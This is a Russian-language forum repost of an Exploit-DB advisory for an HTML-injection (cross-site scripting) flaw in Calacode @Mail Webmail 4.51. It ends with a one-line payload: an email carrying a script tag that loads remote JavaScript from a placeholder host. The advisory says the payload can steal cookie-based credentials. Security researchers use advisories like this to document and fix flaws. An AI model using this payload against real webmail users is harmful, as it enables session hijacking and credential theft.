Exploit Calacode @Mail Webmail 4.51 - Filtering Engine HTML Injection

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
29304
Проверка EDB
  1. Пройдено
Автор
PHILIPPE C. CATUREGLI
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
N/A
Дата публикации
2006-12-20
Calacode @mail Webmail 4.51 - Filtering Engine HTML Injection
Код:
source: https://www.securityfocus.com/bid/21708/info

Calacode @Mail is prone to an HTML-injection vulnerability because it fails to sufficiently sanitize user-supplied data.

An attacker can exploit this issue to execute arbitrary script code in the victim's browser, in the context of the affected site, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible.

Create am email message containing:
<SCRIPT/XSS src=//www.example.com/xss.js></SCRIPT>
 
Источник
www.exploit-db.com

Похожие темы